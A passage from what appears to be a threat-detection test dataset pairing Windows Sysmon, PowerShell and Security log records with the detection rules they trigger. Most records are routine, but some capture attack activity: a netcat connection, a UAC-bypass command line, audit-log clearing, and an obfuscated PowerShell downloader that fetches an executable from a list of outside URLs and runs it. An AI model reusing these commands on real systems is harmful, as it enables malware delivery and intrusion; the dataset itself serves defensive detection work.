04:18:40.459"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":13,"EventRecordID":17915,"Execution":{"#attributes":{"ProcessID":2024,"ThreadID":1212}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2019-05-15T04:18:40.474644Z"}},"Version":2}}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2020-10-17 16:27:10.777","Image":"C:\\Windows\\System32\\RuntimeBroker.exe","ProcessGuid":"747F3D96-1B5E-5F8B-0000-001034322200","ProcessId":2720,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\HCJVGQ5XQYJQFTRJAKRF.temp","UtcTime":"2020-10-17 16:27:10.777"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":419627,"Execution":{"#attributes":{"ProcessID":3344,"ThreadID":4376}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2020-10-17T16:27:10.787882Z"}},"Version":2}}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2020-10-17 16:27:10.777","Image":"C:\\Windows\\System32\\RuntimeBroker.exe","ProcessGuid":"747F3D96-1B5E-5F8B-0000-001034322200","ProcessId":2720,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\ff99ba2fb2e34b73.customDestinations-ms~RF6f668.TMP","UtcTime":"2020-10-17 16:27:10.777"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":419628,"Execution":{"#attributes":{"ProcessID":3344,"ThreadID":4376}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2020-10-17T16:27:10.791010Z"}},"Version":2}}}},{"detection":["Stop Windows Service"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"sc stop CDPSvc","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Service Control Manager Configuration Tool","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=622FA2729408E5F467A592223219DA7C547E7CC7,MD5=ABB56882148DE65D53ABFC55544A49A8,SHA256=78097C7CD0E57902536C60B7FA17528C313DB20869E5F944223A0BA4C801D39B,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF","Image":"C:\\Windows\\System32\\sc.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-06A4-5E76-0000-002043DE0200","LogonId":"0x2de43","OriginalFileName":"sc.exe","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-077C-5E76-0000-0010A5BA2300","ParentProcessId":5068,"ProcessGuid":"747F3D96-0A17-5E76-0000-001062373A00","ProcessId":4876,"Product":"Microsoft® Windows® Operating System","RuleName":"Persistence or Exec - Services Management","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2020-03-21 12:35:35.023"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":244333,"Execution":{"#attributes":{"ProcessID":2844,"ThreadID":3648}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2020-03-21T12:35:35.026859Z"}},"Version":5}}}},{"detection":["Service Execution"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"net start CDPSvc","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Net Command","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=4F4970C3545972FEA2BC1984D597FC810E6321E0,MD5=AE61D8F04BCDE8158304067913160B31,SHA256=25C8266D2BC1D5626DCDF72419838B397D28D44D00AC09F02FF4E421B43EC369,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07","Image":"C:\\Windows\\System32\\net.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-06A4-5E76-0000-002043DE0200","LogonId":"0x2de43","OriginalFileName":"net.exe","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-077C-5E76-0000-0010A5BA2300","ParentProcessId":5068,"ProcessGuid":"747F3D96-0A2B-5E76-0000-0010C02A3D00","ProcessId":7072,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2020-03-21 12:35:55.872"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":244336,"Execution":{"#attributes":{"ProcessID":2844,"ThreadID":3648}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2020-03-21T12:35:55.876452Z"}},"Version":5}}}},{"detection":["Service Execution"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"C:\\Windows\\system32\\net1 start CDPSvc","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Net Command","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=085E23DF67774ED89FD0215E1F144824F79F812B,MD5=63DD4523677E62A73A8A7494DB321EA2,SHA256=C687157FD58EAA51757CDA87D06C30953A31F03F5356B9F5A9C004FA4BAD4BF5,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E","Image":"C:\\Windows\\System32\\net1.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-06A4-5E76-0000-002043DE0200","LogonId":"0x2de43","OriginalFileName":"net1.exe","ParentCommandLine":"net start CDPSvc","ParentImage":"C:\\Windows\\System32\\net.exe","ParentProcessGuid":"747F3D96-0A2B-5E76-0000-0010C02A3D00","ParentProcessId":7072,"ProcessGuid":"747F3D96-0A2B-5E76-0000-0010A92C3D00","ProcessId":7664,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2020-03-21 12:35:55.891"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":244337,"Execution":{"#attributes":{"ProcessID":2844,"ThreadID":3648}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2020-03-21T12:35:55.897450Z"}},"Version":5}}}},{"detection":["Whoami Execution","Local Accounts Discovery"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"whoami","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"whoami - displays logged on user information","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=47D7864D26FC67E0D60391CBF170D33DA518C322,MD5=43C2D3293AD939241DF61B3630A9D3B6,SHA256=1D5491E3C468EE4B4EF6EDFF4BBC7D06EE83180F6F0B1576763EA2EFE049493A,IMPHASH=7FF0758B766F747CE57DFAC70743FB88","Image":"C:\\Windows\\System32\\whoami.exe","IntegrityLevel":"System","LogonGuid":"747F3D96-069C-5E76-0000-0020E7030000","LogonId":"0x3e7","OriginalFileName":"whoami.exe","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-08DA-5E76-0000-001054382E00","ParentProcessId":2632,"ProcessGuid":"747F3D96-0A33-5E76-0000-0010B8813D00","ProcessId":3696,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":0,"User":"NT AUTHORITY\\SYSTEM","UtcTime":"2020-03-21 12:36:03.899"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":244341,"Execution":{"#attributes":{"ProcessID":2844,"ThreadID":3648}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2020-03-21T12:36:03.901088Z"}},"Version":5}}}},{"detection":["Execution from Suspicious Folder","Suspicious Program Location with Network Connections"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"nc.exe 127.0.0.1 1337","Company":"?","CurrentDirectory":"c:\\Users\\Public\\Tools\\","Description":"?","FileVersion":"?","Hashes":"SHA1=08664F5C3E07862AB9B531848AC92D08C8C6BA5A,MD5=E0DB1D3D47E312EF62E5B0C74DCEAFE5,SHA256=B3B207DFAB2F429CC352BA125BE32A0CAE69FE4BF8563AB7D0128BBA8C57A71C,IMPHASH=98CE7B6533CBD67993E36DAFB4E95946","Image":"C:\\Users\\Public\\Tools\\nc.exe","IntegrityLevel":"Medium","LogonGuid":"747F3D96-06A4-5E76-0000-002087DE0200","LogonId":"0x2de87","OriginalFileName":"?","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-06EF-5E76-0000-0010DC301A00","ParentProcessId":6236,"ProcessGuid":"747F3D96-0A36-5E76-0000-0010C8923D00","ProcessId":488,"Product":"?","RuleName":"suspicious execution path","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2020-03-21 12:36:06.987"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":244342,"Execution":{"#attributes":{"ProcessID":2844,"ThreadID":3648}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2020-03-21T12:36:06.990686Z"}},"Version":5}}}},{"detection":["Fax Service DLL Search Order Hijack"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Company":"?","Description":"?","FileVersion":"?","Hashes":"SHA1=9D1873AEFC3F59E649F3FB822C1FA3D52C39970E,MD5=9B97E05E67107AA18BBF3E4F5F121B2B,SHA256=9915C62360EFF866C09072AF754FA70A9BD4BF4A73CDB4048F415002F7256AD0,IMPHASH=DF1295012B8EB2127DC3667CF1881634","Image":"C:\\Windows\\System32\\FXSSVC.exe","ImageLoaded":"C:\\Windows\\System32\\Ualapi.dll","OriginalFileName":"?","ProcessGuid":"747F3D96-E8A7-5F26-0000-0010230D1A00","ProcessId":5252,"Product":"?","RuleName":"","Signature":"","SignatureStatus":"Unavailable","Signed":"false","UtcTime":"2020-08-02 16:24:07.483"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":7,"EventRecordID":339882,"Execution":{"#attributes":{"ProcessID":3200,"ThreadID":3596}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":7,"TimeCreated":{"#attributes":{"SystemTime":"2020-08-02T16:24:07.551366Z"}},"Version":3}}}},{"detection":["Whoami Execution","Local Accounts Discovery"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"whoami","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"whoami - displays logged on user information","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=47D7864D26FC67E0D60391CBF170D33DA518C322,MD5=43C2D3293AD939241DF61B3630A9D3B6,SHA256=1D5491E3C468EE4B4EF6EDFF4BBC7D06EE83180F6F0B1576763EA2EFE049493A,IMPHASH=7FF0758B766F747CE57DFAC70743FB88","Image":"C:\\Windows\\System32\\whoami.exe","IntegrityLevel":"System","LogonGuid":"747F3D96-E308-5F26-0000-0020E7030000","LogonId":"0x3e7","OriginalFileName":"whoami.exe","ParentCommandLine":"\"c:\\windows\\system32\\cmd.exe\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-E8BA-5F26-0000-001035BE1A00","ParentProcessId":8104,"ProcessGuid":"747F3D96-E8BC-5F26-0000-0010F7C41A00","ProcessId":588,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":0,"User":"NT AUTHORITY\\SYSTEM","UtcTime":"2020-08-02 16:24:28.637"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":339891,"Execution":{"#attributes":{"ProcessID":3200,"ThreadID":3032}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2020-08-02T16:24:28.640990Z"}},"Version":5}}}},{"detection":["Suspicious Svchost Process","Windows Processes Suspicious Parent Directory"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"C:\\Windows\\system32\\svchost.exe -k LocalService -p -s fdPHost","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Host Process for Windows Services","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=A1385CE20AD79F55DF235EFFD9780C31442AA234,MD5=8A0A29438052FAED8A2532DA50455756,SHA256=7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6,IMPHASH=247B9220E5D9B720A82B2C8B5069AD69","Image":"C:\\Windows\\System32\\svchost.exe","IntegrityLevel":"System","LogonGuid":"747F3D96-90AF-610F-0000-0020E5030000","LogonId":"0x3e5","OriginalFileName":"svchost.exe","ParentCommandLine":"?","ParentImage":"?","ParentProcessGuid":"00000000-0000-0000-0000-000000000000","ParentProcessId":632,"ProcessGuid":"747F3D96-182D-610F-0000-00100344D300","ProcessId":11196,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":0,"User":"NT AUTHORITY\\LOCAL SERVICE","UtcTime":"2021-08-07 23:33:01.121"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":556726,"Execution":{"#attributes":{"ProcessID":3232,"ThreadID":4176}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2021-08-07T23:33:01.176666Z"}},"Version":5}}}},{"detection":["Local Accounts Discovery"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"cmd /c start /min C:\\Users\\Public\\KDECO.bat reg delete hkcu\\Environment /v windir /f && REM \\system32\\AppHostRegistrationVerifier.exe","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.592 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"Medium","LogonGuid":"747F3D96-1231-610F-0000-002057A80700","LogonId":"0x7a857","OriginalFileName":"Cmd.Exe","ParentCommandLine":"?","ParentImage":"?","ParentProcessGuid":"00000000-0000-0000-0000-000000000000","ParentProcessId":1108,"ProcessGuid":"747F3D96-183B-610F-0000-0010DC6CD400","ProcessId":11324,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2021-08-07 23:33:15.285"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":557006,"Execution":{"#attributes":{"ProcessID":3232,"ThreadID":4176}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2021-08-07T23:33:15.303423Z"}},"Version":5}}}},{"detection":["Windows PowerShell Web Request"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"MessageNumber":1,"MessageTotal":1,"Path":"","ScriptBlockId":"fdd51159-9602-40cb-839d-c31039ebbc3a","ScriptBlockText":"$Va5w3n8=(('Q'+'2h')+('w9p'+'1'));&('ne'+'w-'+'item') $eNV:teMP\\WOrd\\2019\\ -itemtype DIrectOry;[Net.ServicePointManager]::\"SecURi`T`ypRO`T`oCOL\" = ('t'+'ls'+'1'+('2, tl'+'s')+'11'+(', '+'tls'));$Depssu0 = (('D'+'yx')+('x'+'ur4g')+'x');$A74_j9r=('T'+'4'+('gf45'+'h'));$Fdkhtf_=$env:temp+(('{0}'+'word{'+'0}'+('2'+'01')+'9{0}') -F [CHAr]92)+$Depssu0+('.'+('ex'+'e'));$O39nj1p=('J6'+'9l'+('hm'+'h'));$Z8i525z=&('new-'+'obje'+'c'+'t') neT.WEbcLiENt;$Iwmfahs=(('h'+'ttp')+(':'+'//')+('q'+'u'+'anticaelectro'+'n'+'ic')+('s.com'+'/')+'w'+'p-'+'a'+('d'+'min')+'/'+'7A'+('Tr78'+'/*'+'htt')+('p'+'s:/')+('/r'+'e')+'be'+('l'+'co')+'m'+'.'+('ch/'+'pi'+'c')+('ture'+'_')+('l'+'ibra'+'ry/bbCt')+('l'+'S/')+('*ht'+'tp'+'s:/')+('/re'+'al')+'e'+'s'+('tate'+'a')+('gen'+'t')+'te'+('am.co'+'m')+'/'+('163/Q'+'T')+'d'+('/'+'*ht'+'tps:')+'//'+('w'+'ww.')+('ri'+'dd')+('hi'+'display.'+'c'+'o')+'m/'+'r'+'id'+'d'+('hi'+'/1pKY/'+'*htt')+'p'+(':'+'//')+('radi'+'osu'+'bmit.com/'+'sear')+('ch_'+'tes'+'t')+'/'+'p'+('/*'+'h')+('ttp'+':/')+'/'+('res'+'e')+'ar'+('ch'+'c')+'he'+'m'+('plu'+'s.'+'c')+('om/w'+'p-')+('a'+'dmin')+'/1'+('OC'+'C')+'/'+('*http:'+'/')+('/s'+'zymo')+('ns'+'zyp')+'er'+('sk'+'i')+('.'+'pl/a')+'ss'+('ets/'+'p')+'k/').\"S`Plit\"([char]42);$Zxnbryr=(('Dp'+'z9')+'4'+'a6');foreach($Mqku5a2 in $Iwmfahs){try{$Z8i525z.\"d`OWN`load`FIlE\"($Mqku5a2, $Fdkhtf_);$Lt8bjj7=('Ln'+('wp'+'ag')+'m');If ((.('Get-I'+'t'+'em') $Fdkhtf_).\"le`NgTH\" -ge 28315) {cp (gcm calc).path $Fdkhtf_ -Force; .('Invo'+'ke'+'-Item')($Fdkhtf_);$Nfgrgu9=(('Qj6'+'bs')+'x'+'n');break;$D7ypgo1=('Bv'+('e'+'bc')+'k0')}}catch{}}$Gmk6zmk=(('Z2x'+'aaj')+'0')"},"System":{"Channel":"Microsoft-Windows-PowerShell/Operational","Computer":"DESKTOP-RIPCLIP","Correlation":{"#attributes":{"ActivityID":"CCAD9034-7B61-0001-83CF-ADCC617BD601"}},"EventID":4104,"EventRecordID":683,"Execution":{"#attributes":{"ProcessID":6620,"ThreadID":6340}},"Keywords":"0x0","Level":5,"Opcode":15,"Provider":{"#attributes":{"Guid":"A0C1853B-5C40-4B15-8766-3CF1C58F985A","Name":"Microsoft-Windows-PowerShell"}},"Security":{"#attributes":{"UserID":"S-1-5-21-2895499743-3664716236-3399808827-1001"}},"Task":2,"TimeCreated":{"#attributes":{"SystemTime":"2020-08-26T05:09:28.845521Z"}},"Version":1}}}},{"detection":["(Built-in Logic) - Security audit log was cleared"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"System":{"Channel":"Security","Computer":"WIN-77LTAPHIQ1R.example.corp","Correlation":null,"EventID":1102,"EventRecordID":565591,"Execution":{"#attributes":{"ProcessID":780,"ThreadID":2472}},"Keywords":"0x4020000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"{fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148}","Name":"Microsoft-Windows-Eventlog"}},"Security":null,"Task":104,"TimeCreated":{"#attributes":{"SystemTime":"2019-03-18T23:23:37.147709Z"}},"Version":0},"UserData":{"LogFileCleared":{"#attributes":{"xmlns":"http://manifests.microsoft.com/win/2004/08/windows/eventlog"},"SubjectDomainName":"EXAMPLE","SubjectLogonId":"0x4fd77","SubjectUserName":"administrator","SubjectUserSid":"S-1-5-21-1587066498-1489273250-1035260531-500"}}}}},{"detection":["(Built-in Logic) - Security audit log was cleared"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"System":{"Channel":"Security","Computer":"WIN-77LTAPHIQ1R.example.corp","Correlation":null,"EventID":1102,"EventRecordID":32853,"Execution":{"#attributes":{"ProcessID":736,"ThreadID":1592}},"Keywords":"0x4020000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"{fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148}","Name":"Microsoft-Windows-Eventlog"}},"Security":null,"Task":104,"TimeCreated":{"#attributes":{"SystemTime":"2019-01-20T07:00:50.800225Z"}},"Version":0},"UserData":{"LogFileCleared":{"#attributes":{"xmlns":"http://manifests.microsoft.com/win/2004/08/windows/eventlog"},"SubjectDomainName":"EXAMPLE","SubjectLogonId":"0x35312","SubjectUserName":"Administrator","SubjectUserSid":"S-1-5-21-1587066498-1489273250-1035260531-500"}}}}},{"detection":["(Built-in Logic) - Security audit log was cleared"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"System":{"Channel":"Security","Computer":"WIN-77LTAPHIQ1R.example.corp","Correlation":null,"EventID":1102,"EventRecordID":32950,"Execution":{"#attributes":{"ProcessID":736,"ThreadID":2372}},"Keywords":"0x4020000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"{fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148}","Name":"Microsoft-Windows-Eventlog"}},"Security":null,"Task":104,"TimeCreated":{"#attributes":{"SystemTime":"2019-01-20T07:29:57.863893Z"}},"Version":0},"UserData":{"LogFileCleared":{"#attributes":{"xmlns":"http://manifests.microsoft.com/win/2004/08/windows/eventlog"},"SubjectDomainName":"EXAMPLE","SubjectLogonId":"0x35312","SubjectUserName":"Administrator","SubjectUserSid":"S-1-5-21-1587066498-1489273250-1035260531-500"}}}}},{"detection":["Taskmgr as Parent"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"cmd.exe","Company":"Microsoft Corporation","CurrentDirectory":"C:\\windows\\","Description":"Windows Command Processor","FileVersion":"10.0.18362.449 (WinBuild.160101.0800)","Hashes":"SHA1=8DCA9749CD48D286950E7A9FA1088C937CBCCAD4,MD5=D7AB69FAD18D4A643D84A271DFC0DBDF,SHA256=FF79D3C4A0B7EB191783C323AB8363EBD1FD10BE58D8BCC96B07067743CA81D5,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"00247C92-8C36-5F75-0000-002034E39103","LogonId":"0x391e334","OriginalFileName":"Cmd.Exe","ParentCommandLine":"C:\\windows\\system32\\taskmgr.exe","ParentImage":"C:\\Windows\\System32\\Taskmgr.exe","ParentProcessGuid":"00247C92-858E-5F7B-0000-00105241202B","ParentProcessId":18404,"ProcessGuid":"00247C92-858E-5F7B-0000-0010E741202B","ProcessId":6636,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":2,"User":"LAPTOP-JU4M3I0E\\bouss","UtcTime":"2020-10-05 20:43:58.450"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"LAPTOP-JU4M3I0E","Correlation":null,"EventID":1,"EventRecordID":2164892,"Execution":{"#attributes":{"ProcessID":5424,"ThreadID":6708}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2020-10-05T20:43:58.451314Z"}},"Version":5}}}},{"detection":["HH.exe Execution"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"\"C:\\Windows\\hh.exe\" C:\\Users\\IEUser\\Desktop\\Fax Record N104F.chm","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Users\\IEUser\\Desktop\\","Description":"Microsoft® HTML Help Executable","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=4B1E2F8EFBECB677080DBB26876311D9E06C5020,MD5=1CECEE8D02A8E9B19D3A1A65C7A2B249,SHA256=8AB2F9A4CA87575F03F554AEED6C5E0D7692FA9B5D420008A1521F7F7BD2D0A5,IMPHASH=D3D9C3E81A404E7F5C5302429636F04C","Image":"C:\\Windows\\hh.exe","IntegrityLevel":"Medium","LogonGuid":"747F3D96-ABD5-5D3A-0000-0020EB990F00","LogonId":"0xf99eb","ParentCommandLine":"C:\\Windows\\Explorer.EXE","ParentImage":"C:\\Windows\\explorer.exe","ParentProcessGuid":"747F3D96-ABD7-5D3A-0000-001012661000","ParentProcessId":4940,"ProcessGuid":"747F3D96-AE22-5D3A-0000-001096B24E00","ProcessId":1504,"Product":"HTML Help","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-26 07:39:14.345"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4348,"Execution":{"#attributes":{"ProcessID":5924,"ThreadID":6056}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-26T07:39:14.375565Z"}},"Version":5}}}},{"detection":["Suspicious Copy From or To System32","HTML Help Shell 